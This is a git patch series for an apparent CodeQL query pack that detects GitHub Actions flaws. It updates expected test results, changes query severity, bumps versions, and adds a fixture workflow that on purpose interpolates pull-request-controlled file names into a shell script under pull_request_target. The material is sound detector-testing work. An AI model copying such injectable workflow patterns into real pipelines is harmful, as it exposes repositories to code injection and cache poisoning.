Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4..5641ea53afd 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc11..fdb5beb09aa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | 
.github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66c..a18aa5bdc80 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| 
.github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| 
.github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From d13a937a5ddaa49ddd37043263fc77141694f957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:30:43 +0200 Subject: [PATCH 0322/1267] Update Cache Poisoning --- .../CWE-349/.github/workflows/test19.yml | 42 +++++++++++++++++++ .../CachePoisoningByCodeInjection.expected | 13 ++++++ 2 files changed, 55 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml new file mode 100644 index 00000000000..1f0e7291442 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml 
@@ -0,0 +1,42 @@
+name: Close Translation Pull Requests
+
+on:
+ pull_request_target:
+ branches: [ master, main, dev ]
+
+jobs:
+
+ close-translation-prs:
+
+ name: Close Translation Pull Requests
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Get changed files
+ id: modified_files
+ uses: trilom/file-changes-action@v1.2.4
+ with:
+ output: ","
+
+ - name: Check the PR for translations
+ id: check
+ run: |
+ shopt -s nocasematch
+ if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then
+ echo "Found modified en_gb, likely a valid PR"
+ unset CLOSE
+ elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then
+ echo "Found modified strings.po, unwanted."
+ CLOSE="true"
+ elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then
+ echo "Found added strings.po, unwanted."
+ CLOSE="true"
+ elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then
+ echo "Found removed strings.po, unwanted."
+ CLOSE="true"
+ else
+ echo "No strings.po were modified or added, not a translation."
+ unset CLOSE
+ fi
+ echo ::set-output name=close::${CLOSE}
+
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected
index 60c25e1cd92..e0a5e8fd4b1 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected
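Review bot: The new fixture exercises only the flagged form, where `${{ steps.modified_files.outputs.* }}` is expanded straight into the `run:` script of the `check` step (new-file lines 25, 28, 31 and 34). The updated `.expected` file can therefore show that the query fires, but not that it stays quiet once the value is passed as data. The changed-file names come from the pull request and the workflow runs on `pull_request_target`, so a companion step using the environment would document the mitigation and presumably guard against false positives: `env:` / `FILES: ${{ steps.modified_files.outputs.files_modified }}` and `if [[ "$FILES" == *"strings.po"* ]]; then`. Appending that step after the existing one keeps the four recorded locations unchanged, whereas anything inserted earlier, including a header comment, would require regenerating the expected output.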
@@ -1,7 +1,20 @@ edges +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | subpaths #select | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. 
| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | 
From 49a2fd82b1473eaeb6b820ed57c90e58db24b332 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:32:11 +0200 Subject: [PATCH 0323/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 48045dbf679..9e87409504d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.33 +version: 0.0.34 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2f79bddd77e..343bd9d6a22 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.33 +version: 0.0.34 groups: - actions - queries From c45d4d37aa46a5af27b9016a9cc6366d89838c5d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:34:42 +0200 Subject: [PATCH 0324/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9e87409504d..1999bd326a1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.34 +version: 0.0.35 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 343bd9d6a22..bd34a5c9125 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.34 +version: 0.0.35 groups: - actions - queries From 3f0f75a7c5787eb6a4c7bd42a2ff85a2d8e0808f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 7 Jun 2024 10:05:39 +0200 Subject: [PATCH 0325/1267] Make CachePoisoning queries high severity --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index a6dc7e14fdd..feef4316461 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -4,7 +4,7 @@ * @kind problem * @problem.severity error * @precision high - * @security-severity 9.3 + * @security-severity 7.5 * @id actions/cache-poisoning * @tags actions * security diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 8fdebdbde18..030dd872cb2 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity error * @precision high - * @security-severity 9.3 + * @security-severity 7.5 * @id actions/cache-poisoning/code-injection * @tags actions * security From 92cd50393b485895391a61aadc7ba2053d76ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 7 Jun 2024 10:06:46 +0200 Subject: [PATCH 0326/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1999bd326a1..5cfa47a5cdf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.35 +version: 0.0.36 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index bd34a5c9125..65bb672183f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
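Review bot: Lowering `@security-severity` from 9.3 to 7.5 in `CachePoisoning.ql`, and identically in the `CachePoisoningByCodeInjection.ql` hunk, moves these alerts from code scanning's critical band to high, and neither the commit message nor the query header records why. Consumers who gate merges only on critical alerts would stop blocking on these results after upgrading the pack, so the rationale deserves a sentence in the commit description or a change note, for example `Cache poisoning queries are now reported as high (7.5) instead of critical (9.3): <rationale>`. `@problem.severity error` and `@precision high` are unchanged, so only the security score differs. Both QLDoc headers start and end outside the hunks, so the rest of the metadata could not be checked.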
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.35 +version: 0.0.36 groups: - actions - queries From ad1f35c86a7f7b957346747be585b5acf9431e05 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 0327/1267] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 12 ++- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- 